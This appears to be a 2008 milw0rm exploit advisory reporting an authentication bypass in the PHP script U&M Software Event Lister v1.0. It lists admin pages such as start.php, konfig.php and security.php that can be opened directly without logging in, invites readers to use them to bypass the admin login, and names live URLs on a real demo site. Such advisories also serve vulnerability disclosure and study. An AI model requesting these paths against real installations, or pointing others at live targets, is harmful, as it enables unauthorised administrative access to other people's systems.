============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | \ | | / _ \ | |/ / | | _ | || |_ | \| | | | | | | ' / | |_| | |__ _| | |\ | | |_| | | . \ \____| |_| |_| \_| \___/ |_|\_\ ============================================================================== U&M Software Event Lister v1.0 Auth Bypass Vulnerability ============================================================================== [»] Script: [ U&M Software Event Lister v1.0 ] [»] Language: [ PHP ] [»] Website: [ http://www.hotscripts.com/Detailed/84735.html ] [»] Type: [ Commercial ] [»] Report-Date: [ 06.11.2008 ] [»] Founder: [ G4N0K ] ===[ XPL ]=== [!] Use one of these paths to bypass admin login ;) [»] http://localhost/[path]/admin/start.php [»] http://localhost/[path]/admin/aktivitet.php [»] http://localhost/[path]/admin/prop_aktivitet.php [»] http://localhost/[path]/admin/kategorier.php [»] http://localhost/[path]/admin/konfig.php [»] http://localhost/[path]/admin/security.php [»] http://localhost/[path]/admin/manual.php ===[ LIVE ]=== [»] http://www.justlistit.uochm.com/demo/admin/start.php [»] http://www.justlistit.uochm.com/demo/admin/index.php ===[ Greetz ]=== [»] ALLAH [»] Tornado2800 [»] Hussain-X //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =============================================================================== exit(); //EoX =============================================================================== # milw0rm.com [2008-11-07]